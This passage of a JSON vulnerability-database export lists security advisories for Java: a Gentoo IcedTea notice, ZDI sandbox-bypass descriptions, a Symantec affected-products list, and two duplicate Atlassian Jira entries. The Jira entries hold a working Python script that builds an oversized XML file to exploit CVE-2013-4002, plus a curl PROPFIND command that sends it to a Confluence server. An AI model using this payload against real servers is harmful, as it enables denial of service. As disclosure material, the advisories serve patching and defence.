"CVE-2013-5772", "CVE-2013-0419"], "lastseen": "2016-09-06T19:46:14"}, {"id": "GLSA-201406-32", "type": "gentoo", "title": "IcedTea JDK: Multiple vulnerabilities", "description": "### Background\n\nIcedTea is a distribution of the Java OpenJDK source code built with free build tools. \n\n### Description\n\nMultiple vulnerabilities have been discovered in the IcedTea JDK. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, bypass intended security policies, or have other unspecified impact. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll IcedTea JDK users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/icedtea-bin-6.1.13.3\"", "published": "2014-06-29T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://security.gentoo.org/glsa/201406-32", "cvelist": ["CVE-2012-5089", "CVE-2013-0426", "CVE-2013-2431", "CVE-2010-3562", "CVE-2013-2420", "CVE-2011-0865", "CVE-2013-2384", "CVE-2013-2415", "CVE-2012-1711", "CVE-2014-2397", "CVE-2013-1571", "CVE-2013-5782", "CVE-2011-3557", "CVE-2013-2417", "CVE-2013-1500", "CVE-2013-2448", "CVE-2010-3557", "CVE-2011-3551", "CVE-2013-4002", "CVE-2013-0401", "CVE-2012-5074", "CVE-2012-5073", "CVE-2013-0427", "CVE-2012-1725", "CVE-2013-2424", "CVE-2014-0457", "CVE-2013-5850", "CVE-2013-2407", "CVE-2013-5778", "CVE-2013-1478", "CVE-2013-2456", "CVE-2010-3551", "CVE-2011-0868", "CVE-2013-0428", "CVE-2014-0446", "CVE-2013-2436", "CVE-2013-2454", "CVE-2013-2470", "CVE-2013-1485", "CVE-2013-0169", "CVE-2010-3553", "CVE-2012-1719", "CVE-2014-1876", "CVE-2014-0458", "CVE-2013-0429", "CVE-2014-2427", "CVE-2011-3563", "CVE-2013-1475", "CVE-2013-2421", "CVE-2013-1518", "CVE-2013-0435", "CVE-2012-5087", "CVE-2013-0809", "CVE-2013-0442", "CVE-2010-3566", "CVE-2013-2452", "CVE-2013-2451", "CVE-2013-5842", "CVE-2010-4448", "CVE-2013-0431", "CVE-2010-4465", "CVE-2012-5085", "CVE-2012-4540", "CVE-2011-0869", "CVE-2010-3565", "CVE-2012-5076", "CVE-2013-5830", "CVE-2013-2473", "CVE-2013-6954", "CVE-2012-4416", "CVE-2012-5075", "CVE-2014-0453", "CVE-2013-1488", "CVE-2012-0424", "CVE-2013-0434", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2011-3548", "CVE-2012-5081", "CVE-2011-3547", "CVE-2013-5817", "CVE-2010-4469", "CVE-2012-0503", "CVE-2011-3521", "CVE-2013-0443", "CVE-2011-5035", "CVE-2013-2419", "CVE-2014-0461", "CVE-2012-1723", "CVE-2013-2463", "CVE-2011-3571", "CVE-2010-3860", "CVE-2011-3389", "CVE-2013-2469", "CVE-2014-0459", "CVE-2014-0456", "CVE-2010-4450", "CVE-2012-1726", "CVE-2013-2465", "CVE-2013-1537", "CVE-2014-0429", "CVE-2013-5806", "CVE-2010-3574", "CVE-2011-3544", "CVE-2013-5805", "CVE-2011-3553", "CVE-2013-0444", "CVE-2012-0506", "CVE-2013-0433", "CVE-2013-1480", "CVE-2013-5825", "CVE-2012-1717", "CVE-2013-2423", "CVE-2010-3541", "CVE-2013-5823", "CVE-2011-3558", "CVE-2014-2403", "CVE-2012-1713", "CVE-2013-2461", "CVE-2012-1716", "CVE-2009-3555", "CVE-2013-2429", "CVE-2013-5849", "CVE-2014-2412", "CVE-2010-2548", "CVE-2012-5086", "CVE-2013-2471", "CVE-2012-0497", "CVE-2012-5077", "CVE-2013-1486", "CVE-2013-1476", "CVE-2010-4476", "CVE-2010-4472", "CVE-2013-5780", "CVE-2010-4471", "CVE-2014-2421", "CVE-2012-5069", "CVE-2012-3216", "CVE-2014-0460", "CVE-2011-0870", "CVE-2011-0815", "CVE-2013-0432", "CVE-2012-0505", "CVE-2012-5084", "CVE-2012-1718", "CVE-2010-2783", "CVE-2013-2458", "CVE-2011-3554", "CVE-2013-0424", "CVE-2013-2459", "CVE-2013-0450", "CVE-2012-5071", "CVE-2013-5814", "CVE-2010-3561", "CVE-2011-0025", "CVE-2012-0501", "CVE-2010-3564", "CVE-2013-0440", "CVE-2013-2443", "CVE-2010-3549", "CVE-2012-3422", "CVE-2013-2446", "CVE-2011-3556", "CVE-2012-0547", "CVE-2013-5829", "CVE-2010-3554", "CVE-2013-5803", "CVE-2012-5072", "CVE-2013-2450", "CVE-2013-2472", "CVE-2014-2423", "CVE-2010-4470", "CVE-2011-0822", "CVE-2011-3560", "CVE-2013-1493", "CVE-2013-2444", "CVE-2013-2447", "CVE-2013-2457", "CVE-2010-4351", "CVE-2011-0864", "CVE-2013-2453", "CVE-2013-1557", "CVE-2013-2426", "CVE-2013-2455", "CVE-2013-2422", "CVE-2013-2383", "CVE-2013-0425", "CVE-2013-1484", "CVE-2011-3552", "CVE-2013-5774", "CVE-2012-1724", "CVE-2010-3567", "CVE-2010-3573", "CVE-2013-6629", "CVE-2012-5068", "CVE-2013-3829", "CVE-2013-0441", "CVE-2010-3548", "CVE-2011-0706", "CVE-2012-5979", "CVE-2012-0502", "CVE-2013-5783", "CVE-2010-4467", "CVE-2012-3423", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5790", "CVE-2014-2398", "CVE-2010-3568", "CVE-2014-0451", "CVE-2013-1569", "CVE-2013-2412", "CVE-2014-0452", "CVE-2011-0862", "CVE-2013-2445", "CVE-2013-2430", "CVE-2013-2460", "CVE-2013-5840", "CVE-2014-2414", "CVE-2010-3569", "CVE-2011-0871", "CVE-2013-2449", "CVE-2011-0872", "CVE-2012-5070", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2016-09-06T19:46:20"}], "atlassian": [{"id": "ATLASSIAN:CONFSERVER-37991", "type": "atlassian", "title": "Denial of Service attack through vulnerable Xerces-J library", "description": "{quote}\r\nThere is WebDav endpoint that is accessible via following URL -\r\nhttps://pwnie.ninja/confluence/plugins/servlet/confluence/default . It is possible to pass XML as data for\r\nPROPFIND request.\r\nFollowing python code will generate XML with long pseudo-attribute name that exploits CVE-2013-4002\r\nissue.\r\n{code}\r\n#!/usr/bin/env python\r\nimport os\r\noutdir = raw_input('specify output directory > ')\r\n### XML to exploit CVE-2013-4002\r\nxml = \"<?xml \" + \"\\xe7\\x9a\\x84\"*1000000 + \"='china' version = '1.0'?><a/>\"\r\nwith open(os.path.join(outdir,'cve2013-4002.xml'),'w') as out:\r\nout.write(xml)\r\ndef sizeof(num, suffix='B'):\r\n for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:\r\n if abs(num) < 1024.0:\r\n return \"%3.1f%s%s\" % (num, unit, suffix)\r\n num /= 1024.0\r\n return \"%.1f%s%s\" % (num, 'Yi', suffix)\r\nprint \"[+] File 'cve2013-4002.xml':\", sizeof(len(xml))\r\n{code}\r\nAccording to XML specification there are only three valid pseudo-attributes: version, encoding and\r\nstandalone. When we submit any random pseudo-attribute with long name, secure version of Xerces-J\r\nparser just ignores it. At the same time vulnerable version will try to parse it. This will require much CPU\r\nwork.\r\nIf you try to send this request with curl, you will see that there is no immediate answer from server. You\r\nwill get \u201cGateway Time-out\u201d answer from the server after 4 minutes.\r\n{code}\r\ncurl -X 'PROPFIND' -H 'Depth: 0' -H 'Content-Type: application/xml'\r\n-H 'Authorization: Basic Z3IzM2t3YXJpb3I6c2ExODEyODM5MSE=' --databinary\r\n'@/tmp/cve2013-4002.xml'\r\nhttps://pwnie.ninja/confluence/plugins/servlet/confluence/default\r\n{code}\r\n{quote}", "published": "2015-06-19T06:43:36", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://jira.atlassian.com/browse/CONFSERVER-37991", "cvelist": ["CVE-2013-4002"], "lastseen": "2017-04-02T06:17:25"}, {"id": "ATLASSIAN:CONF-37991", "type": "atlassian", "title": "Denial of Service attack through vulnerable Xerces-J library", "description": "{quote}\r\nThere is WebDav endpoint that is accessible via following URL -\r\nhttps://pwnie.ninja/confluence/plugins/servlet/confluence/default . It is possible to pass XML as data for\r\nPROPFIND request.\r\nFollowing python code will generate XML with long pseudo-attribute name that exploits CVE-2013-4002\r\nissue.\r\n{code}\r\n#!/usr/bin/env python\r\nimport os\r\noutdir = raw_input('specify output directory > ')\r\n### XML to exploit CVE-2013-4002\r\nxml = \"<?xml \" + \"\\xe7\\x9a\\x84\"*1000000 + \"='china' version = '1.0'?><a/>\"\r\nwith open(os.path.join(outdir,'cve2013-4002.xml'),'w') as out:\r\nout.write(xml)\r\ndef sizeof(num, suffix='B'):\r\n for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:\r\n if abs(num) < 1024.0:\r\n return \"%3.1f%s%s\" % (num, unit, suffix)\r\n num /= 1024.0\r\n return \"%.1f%s%s\" % (num, 'Yi', suffix)\r\nprint \"[+] File 'cve2013-4002.xml':\", sizeof(len(xml))\r\n{code}\r\nAccording to XML specification there are only three valid pseudo-attributes: version, encoding and\r\nstandalone. When we submit any random pseudo-attribute with long name, secure version of Xerces-J\r\nparser just ignores it. At the same time vulnerable version will try to parse it. This will require much CPU\r\nwork.\r\nIf you try to send this request with curl, you will see that there is no immediate answer from server. You\r\nwill get \u201cGateway Time-out\u201d answer from the server after 4 minutes.\r\n{code}\r\ncurl -X 'PROPFIND' -H 'Depth: 0' -H 'Content-Type: application/xml'\r\n-H 'Authorization: Basic Z3IzM2t3YXJpb3I6c2ExODEyODM5MSE=' --databinary\r\n'@/tmp/cve2013-4002.xml'\r\nhttps://pwnie.ninja/confluence/plugins/servlet/confluence/default\r\n{code}\r\n{quote}", "published": "2015-06-19T06:43:36", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://jira.atlassian.com/browse/CONF-37991", "cvelist": ["CVE-2013-4002"], "lastseen": "2017-03-22T18:16:54"}], "zdi": [{"id": "ZDI-13-246", "type": "zdi", "title": "Oracle Java ObjectOutputStream Sandbox Bypass Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the usage of ObjectOutputStream. With the usage of this class, it is possible to disable the security manager and run code as privileged. This allows a malicious applet to execute attacker-supplied code resulting in remote code execution under the context of the current user.", "published": "2013-10-16T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-246", "cvelist": ["CVE-2013-5842"], "lastseen": "2016-11-09T00:18:05"}, {"id": "ZDI-13-248", "type": "zdi", "title": "Oracle Java LDAP Deserialization Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of LDAP deserialization. An attacker can use a custom LDAP server to create objects in restricted packages, and leverage this to disable the Java sandbox and execute arbitrary code in the context of the user.", "published": "2013-10-16T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-248", "cvelist": ["CVE-2013-5830"], "lastseen": "2016-11-09T00:18:13"}, {"id": "ZDI-13-244", "type": "zdi", "title": "Oracle Java LdapCtx Sandbox Bypass Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the com.sun.jndi.ldap.LdapCtx class. The issue lies in the ability to call the toString method of an object in a thread with no user stack. An attacker can leverage this vulnerability to execute code under the context of the current process.", "published": "2013-10-16T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-244", "cvelist": ["CVE-2013-5817"], "lastseen": "2016-11-09T00:18:16"}, {"id": "ZDI-13-247", "type": "zdi", "title": "Oracle Java FileImageInputStream Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific vulnerability is inside the FileImageInputStream class. With the usage of this class, it is possible to disable the security manager and run code as privileged. This allows a malicious applet to execute attacker-supplied code resulting in remote code execution under the context of the current user.", "published": "2013-10-16T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-247", "cvelist": ["CVE-2013-5829"], "lastseen": "2016-11-09T00:18:01"}, {"id": "ZDI-13-245", "type": "zdi", "title": "Oracle Java NumberFormatter and RealTimeSequencer Sandbox Bypass Remote Code Execution Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the usage of NumberFormatter and RealTimeSequencer. With the usage of these classes, it is possible to disable the security manager and run code as privileged. This allows a malicious applet to execute attacker-supplied code resulting in remote code execution under the context of the current user.", "published": "2013-10-16T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-13-245", "cvelist": ["CVE-2013-5783"], "lastseen": "2016-11-09T00:17:49"}], "symantec": [{"id": "SMNTC-63131", "type": "symantec", "title": "Oracle Java SE CVE-2013-5838 Remote Security Vulnerability", "description": "### Description\n\nOracle Java SE is prone to a remote security vulnerability. The vulnerability can be exploited over multiple protocols. This issue affects the 'Libraries' sub-component. This vulnerability affects the following supported versions: Java SE 7u25, Java SE Embedded 7u25\n\n### Technologies Affected\n\n * Avaya IP Office Application Server 9.0 \n * Avaya IP Office Server Edition 9.0 \n * CentOS CentOS 5 \n * CentOS CentOS 6 \n * Gentoo Linux \n * HP HP-UX B.11.31 \n * IBM AIX 5.3 \n * IBM AIX 6.1 \n * IBM AIX 7.1 \n * IBM InfoSphere Streams 1.0 \n * IBM InfoSphere Streams 1.0.1 \n * IBM InfoSphere Streams 1.2 \n * IBM InfoSphere Streams 2.0 \n * IBM InfoSphere Streams 3.0 \n * IBM InfoSphere Streams 3.1.0.0 \n * IBM InfoSphere Streams 3.2 \n * IBM Java SDK 1.4.2 \n * IBM Java SDK 5 \n * IBM Java SDK 6 \n * IBM Java SDK 7 \n * IBM Lotus Domino 8.0 \n * IBM Lotus Domino 8.0.1 \n * IBM Lotus Domino 8.0.2 \n * IBM Lotus Domino 8.0.2 FP4 \n * IBM Lotus Domino 8.0.2 Fix Pack 5 \n * IBM Lotus Domino 8.0.2.1 \n * IBM Lotus Domino 8.0.2.2 \n * IBM Lotus Domino 8.0.2.3 \n * IBM Lotus Domino 8.0.2.4 \n * IBM Lotus Domino 8.5.0 \n * IBM Lotus Domino 8.5.0.1 \n * IBM Lotus Domino 8.5.1 \n * IBM Lotus Domino 8.5.1 Fix Pack 2 \n * IBM Lotus Domino 8.5.1.1 \n * IBM Lotus Domino 8.5.1.2 \n * IBM Lotus Domino 8.5.1.3 \n * IBM Lotus Domino 8.5.1.4 \n * IBM Lotus Domino 8.5.1.5 \n * IBM Lotus Domino 8.5.1FP5 \n * IBM Lotus Domino 8.5.2 \n * IBM Lotus Domino 8.5.2 FP2 \n * IBM Lotus Domino 8.5.2 FP3 \n * IBM Lotus Domino 8.5.2 FP3 \n * IBM Lotus Domino 8.5.2 FP4 \n * IBM Lotus Domino 8.5.2.0 \n * IBM Lotus Domino 8.5.2.1 \n * IBM Lotus Domino 8.5.2.2 \n * IBM Lotus Domino 8.5.2.3 \n * IBM Lotus Domino 8.5.2.4 \n * IBM Lotus Domino 8.5.3 \n * IBM Lotus Domino 8.5.3 Fix Pack 3 \n * IBM Lotus Domino 8.5.3 Fix Pack 4 \n * IBM Lotus Domino 8.5.3 Fix Pack 5 \n * IBM Lotus Domino 8.5.3.0 \n * IBM Lotus Domino 8.5.3.1 \n * IBM Lotus Domino 8.5.3.2 \n * IBM Lotus Domino 8.5.3.3 \n * IBM Lotus Domino 8.5.3.4 \n * IBM Lotus Domino 8.5.3.5 \n * IBM Lotus Domino 8.5.3.6 \n * IBM Lotus Domino 8.5.3FP1 \n * IBM Lotus Domino 8.5.4 \n * IBM Lotus Domino 8.5FP1 \n * IBM Lotus Domino 9.0 \n * IBM Lotus Domino 9.0.0.0 \n * IBM Lotus Domino 9.0.1.0 \n * IBM Lotus Notes 8.0 \n * IBM Lotus Notes 8.0.1 \n * IBM Lotus Notes 8.0.2 \n * IBM Lotus Notes 8.0.2 FP6 \n * IBM Lotus Notes 8.0.2.0 \n * IBM Lotus Notes 8.0.2.1 \n * IBM Lotus Notes 8.0.2.2 \n * IBM Lotus Notes 8.0.2.3 \n * IBM Lotus Notes 8.0.2.4 \n * IBM Lotus Notes 8.0.2.5 \n * IBM Lotus Notes 8.0.2.6 \n * IBM Lotus Notes 8.5 \n * IBM Lotus Notes 8.5.0.0 \n * IBM Lotus Notes 8.5.0.1 \n * IBM Lotus Notes 8.5.1 \n * IBM Lotus Notes 8.5.1 \n * IBM Lotus Notes 8.5.1 FP5 \n * IBM Lotus Notes 8.5.1.2 \n * IBM Lotus Notes 8.5.1.3 \n * IBM Lotus Notes 8.5.1.4 \n * IBM Lotus Notes 8.5.1.5 \n * IBM Lotus Notes 8.5.2 \n * IBM Lotus Notes 8.5.2 FP2 \n * IBM Lotus Notes 8.5.2.0 \n * IBM Lotus Notes 8.5.2.1 \n * IBM Lotus Notes 8.5.2.2 \n * IBM Lotus Notes 8.5.2.3 \n * IBM Lotus Notes 8.5.3 \n * IBM Lotus Notes 8.5.3 Fix Pack 2 \n * IBM Lotus Notes 8.5.3 Fix Pack 3 \n * IBM Lotus Notes 8.5.3 Fix Pack 4 \n * IBM Lotus Notes 8.5.3 Fix Pack 5 \n * IBM Lotus Notes 8.5.3.1 \n * IBM Lotus Notes 8.5.3.2 \n * IBM Lotus Notes 8.5.3.3 \n * IBM Lotus Notes 8.5.3.4 \n * IBM Lotus Notes 8.5.3.5 \n * IBM Lotus Notes 8.5.4 \n * IBM Lotus Notes 9.0 \n * IBM Lotus Notes 9.0.1 \n * IBM Operational Decision Manager 8.0 \n * IBM Operational Decision Manager 8.5 \n * IBM PowerSC \n * IBM Smart Analytics System 5600 1 \n * IBM Smart Analytics System 5600 10.1 \n * IBM Smart Analytics System 5600 2 \n * IBM Smart Analytics System 5600 3 \n * IBM Smart Analytics System 5600 9.7 \n * IBM Tivoli Application Dependency Discovery Manager 7.1.2 \n * IBM Tivoli Application Dependency Discovery Manager 7.2 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.1 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.1.5 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.2 \n * IBM Tivoli Application Dependency Discovery Manager 7.2.2.0 \n * IBM Tivoli Composite Application Manager for Transactions 7.1.0.1 \n * IBM Tivoli Composite Application Manager for Transactions 7.1.0.2 \n * IBM Tivoli Composite Application Manager for Transactions 7.1.0.4 \n * IBM Tivoli Composite Application Manager for Transactions 7.2.0.1 \n * IBM Tivoli Composite Application Manager for Transactions 7.2.0.2 \n * IBM Tivoli Composite Application Manager for Transactions 7.2.0.4 \n * IBM Tivoli Composite Application Manager for Transactions 7.3.0.1 \n * IBM Tivoli Endpoint Manager 9.0.0 \n * IBM Tivoli Endpoint Manager 9.0.1 \n * IBM Tivoli Endpoint Manager for Remote Control 8.2 \n * IBM Tivoli Endpoint Manager for Remote Control 8.2.1 \n * IBM Tivoli Policy Driven Software Distribution 7.1 \n * IBM Tivoli Provisioning Manager 7.1.1 \n * IBM Tivoli Storage Productivity Center 4.1 \n * IBM Tivoli Storage Productivity Center 4.2.0 \n * IBM Tivoli Storage Productivity Center 4.2.1 \n * IBM Tivoli Storage Productivity Center 4.2.1 Fix Pack 4 \n * IBM Tivoli Storage Productivity Center 4.2.1.185 \n * IBM Tivoli Storage Productivity Center 4.2.2 FP3 \n * IBM Tivoli Storage Productivity Center 4.2.2.143 (FP3) \n * IBM Tivoli Storage Productivity Center 4.2.2.143 \n * IBM Tivoli Storage Productivity Center 4.2.2.145 \n * IBM Tivoli Storage Productivity Center 4.2.2.170 (FP4) \n * IBM Tivoli Storage Productivity Center 4.2.2.177 \n * IBM Tivoli Storage Productivity Center 5.1.0 \n * IBM Tivoli Storage Productivity Center 5.1.1 \n * IBM Tivoli Storage Productivity Center 5.1.1.0 \n * IBM Tivoli Storage Productivity Center 5.1.1.1 \n * IBM Tivoli Storage Productivity Center 5.1.1.2 \n * IBM Tivoli Storage Productivity Center 5.1.1.3 \n * IBM Tivoli Storage Productivity Center 5.1.1.4 \n * IBM Tivoli Storage Productivity Center 5.2.0 \n * IBM WebSphere ILOG JRules 7.1 \n * IBM WebSphere Operational Decision Management 7.5 \n * IBM WebSphere Real Time 3 SR5 \n * IBM Websphere Application Server 6.1.0.1 \n * IBM Websphere Application Server 6.1.0.10 \n * IBM Websphere Application Server 6.1.0.11 \n * IBM Websphere Application Server 6.1.0.12 \n * IBM Websphere Application Server 6.1.0.13 \n * IBM Websphere Application Server 6.1.0.17 \n * IBM Websphere Application Server 6.1.0.18 \n * IBM Websphere Application Server 6.1.0.19 \n * IBM Websphere Application Server 6.1.0.43 \n * IBM Websphere Application Server 6.1.0.45 \n * IBM Websphere Application Server 6.1.0.45 \n * IBM Websphere Application Server 6.1.0.47 \n * IBM Websphere Application Server 7.0.0.0 \n * IBM Websphere Application Server 7.0.0.1 \n * IBM Websphere Application Server 7.0.0.10 \n * IBM Websphere Application Server 7.0.0.11 \n * IBM Websphere Application Server 7.0.0.14 \n * IBM Websphere Application Server 7.0.0.17 \n * IBM Websphere Application Server 7.0.0.24 \n * IBM Websphere Application Server 7.0.0.27 \n * IBM Websphere Application Server 7.0.0.29 \n * IBM Websphere Application Server 8.0.0.0 \n * IBM Websphere Application Server 8.0.0.1 \n * IBM Websphere Application Server 8.0.0.1 \n * IBM Websphere Application Server 8.0.0.2 \n * IBM Websphere Application Server 8.0.0.4 \n * IBM Websphere Application Server 8.0.0.4 \n * IBM Websphere Application Server 8.0.0.5 \n * IBM Websphere Application Server 8.0.0.7 \n * IBM Websphere Application Server 8.5.0.0 \n * IBM Websphere Application Server 8.5.5.1 \n * Mandriva Business Server 1 \n * Mandriva Business Server 1 X86 64 \n * Oracle Enterprise Linux 5 \n * Oracle Enterprise Linux 6 \n * Oracle Enterprise Linux 6.2 \n * Oracle JDK (Linux Production Release) 1.7.0 \n * Oracle JDK (Linux Production Release) 1.7.0_12 \n * Oracle JDK (Linux Production Release) 1.7.0_13 \n * Oracle JDK (Linux Production Release) 1.7.0_2 \n * Oracle JDK (Linux Production Release) 1.7.0_4 \n * Oracle JDK (Linux Production Release) 1.7.0_7 \n * Oracle JDK (Solaris Production Release) 1.7.0 \n * Oracle JDK (Solaris Production Release) 1.7.0_10 \n * Oracle JDK (Solaris Production Release) 1.7.0_11 \n * Oracle JDK (Solaris Production Release) 1.7.0_2 \n * Oracle JDK (Solaris Production Release) 1.7.0_4 \n * Oracle JDK (Solaris Production Release) 1.7.0_7 \n * Oracle JDK (Windows Production Release) 1.7.0 \n * Oracle JDK (Windows Production Release) 1.7.0_2 \n * Oracle JDK (Windows Production Release) 1.7.0_4 \n * Oracle JDK (Windows Production Release) 1.7.0_7 \n * Oracle JDK(Linux Production Release) 1.6.0_43 \n * Oracle JDK(Linux Production Release) 1.7.0_10 \n * Oracle JDK(Linux Production Release) 1.7.0_11 \n * Oracle JDK(Linux Production Release) 1.7.0_17 \n * Oracle JDK(Linux Production Release) 1.7.0_21 \n * Oracle JDK(Linux Production Release) 1.7.0_25 \n * Oracle JDK(Linux Production Release) 1.7.0_8 \n * Oracle JDK(Linux Production Release) 1.7.0_9 \n * Oracle JDK(Solaris Production Release) 1.7.0_12 \n * Oracle JDK(Solaris Production Release) 1.7.0_13 \n * Oracle JDK(Solaris Production Release) 1.7.0_21 \n * Oracle JDK(Solaris Production Release) 1.7.0_25 \n * Oracle JDK(Solaris Production Release) 1.7.0_8 \n * Oracle JDK(Solaris Production Release) 1.7.0_9 \n * Oracle JDK(Windows Production Release) 1.7.0_10 \n * Oracle JDK(Windows Production Release) 1.7.0_11 \n * Oracle JDK(Windows Production Release) 1.7.0_12 \n * Oracle JDK(Windows Production Release) 1.7.0_13 \n * Oracle JDK(Windows Production Release) 1.7.0_17 \n * Oracle JDK(Windows Production Release) 1.7.0_21 \n * Oracle JDK(Windows Production Release) 1.7.0_25 \n * Oracle JDK(Windows Production Release) 1.7.0_8 \n * Oracle JDK(Windows Production Release) 1.7.0_9 \n * Oracle JRE (Linux Production Release) 1.7.0_12 \n * Oracle JRE (Linux Production Release) 1.7.0_13 \n * Oracle JRE (Linux Production Release) 1.7.0_2 \n * Oracle JRE (Linux Production Release) 1.7.0_21 \n * Oracle JRE (Linux Production Release) 1.7.0_4 \n * Oracle JRE (Linux Production Release) 1.7.0_7 \n * Oracle JRE (Solaris Production Release) 1.7.0_2 \n * Oracle JRE (Solaris Production Release) 1.7.0_4 \n * Oracle JRE (Solaris Production Release) 1.7.0_7 \n * Oracle JRE (Windows Production Release) 1.7.0_2 \n * Oracle JRE (Windows Production Release) 1.7.0_21 \n * Oracle JRE (Windows Production Release) 1.7.0_4 \n * Oracle JRE (Windows Production Release) 1.7.0_7 \n * Oracle JRE(Linux Production Release) 1.7.0_10 \n * Oracle JRE(Linux Production Release) 1.7.0_11 \n * Oracle JRE(Linux Production Release) 1.7.0_17 \n * Oracle JRE(Linux Production Release) 1.7.0_25 \n * Oracle JRE(Linux Production Release) 1.7.0_8 \n * Oracle JRE(Linux Production Release) 1.7.0_9 \n * Oracle JRE(Solaris Production Release) 1.7.0_10 \n * Oracle JRE(Solaris Production Release) 1.7.0_11 \n * Oracle JRE(Solaris Production Release) 1.7.0_13 \n * Oracle JRE(Solaris Production Release) 1.7.0_17 \n * Oracle JRE(Solaris Production Release) 1.7.0_25 \n * Oracle JRE(Solaris Production Release) 1.7.0_8 \n * Oracle JRE(Solaris Production Release) 1.7.0_9 \n * Oracle JRE(Windows Production Release) 1.7.0_10 \n * Oracle JRE(Windows Production Release) 1.7.0_11 \n * Oracle JRE(Windows Production Release) 1.7.0_12 \n * Oracle JRE(Windows Production Release) 1.7.0_13 \n * Oracle JRE(Windows Production Release) 1.7.0_17 \n * Oracle JRE(Windows Production Release) 1.7.0_25 \n * Oracle JRE(Windows Production Release) 1.7.0_8 \n * Oracle JRE(Windows Production Release) 1.7.0_9 \n * Oracle Java SE Embedded 7u25 \n * Redhat Enterprise Linux 5 Server \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop Optional 6 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux HPC Node 6 \n * Redhat Enterprise Linux HPC Node Optional 6 \n * Redhat Enterprise Linux HPC Node Supplementary 6 \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server Optional 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation Optional 6 \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * SuSE CORE 9 \n * SuSE SUSE CORE 9 for x86 \n * SuSE SUSE Linux Enterprise Java 11 SP2 \n * SuSE SUSE Linux Enterprise Java 11 SP3 \n * SuSE SUSE Linux Enterprise Server 10 SP3 LTSS \n * SuSE SUSE Linux Enterprise Server 10 SP4 LTSS \n * SuSE SUSE Linux Enterprise Server 11 SP1 LTSS \n * SuSE SUSE Linux Enterprise Server 11 SP2 \n * SuSE SUSE Linux Enterprise Server 11 SP2 for VMware \n * SuSE SUSE Linux Enterprise Server 11 SP3 \n * SuSE SUSE Linux Enterprise Server 11 SP3 for VMware \n * SuSE SUSE Linux Enterprise Software Development Kit 11 SP2 \n * SuSE SUSE Linux Enterprise Software Development Kit 11 SP3 \n * Sun JRE (Linux Production Release) 1.7 \n * Sun JRE (Solaris Production Release) 1.7 \n * Sun JRE (Windows Production Release) 1.7 \n * VMWare Update Manager 5.5 \n * VMWare vCenter Server 5.5 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are 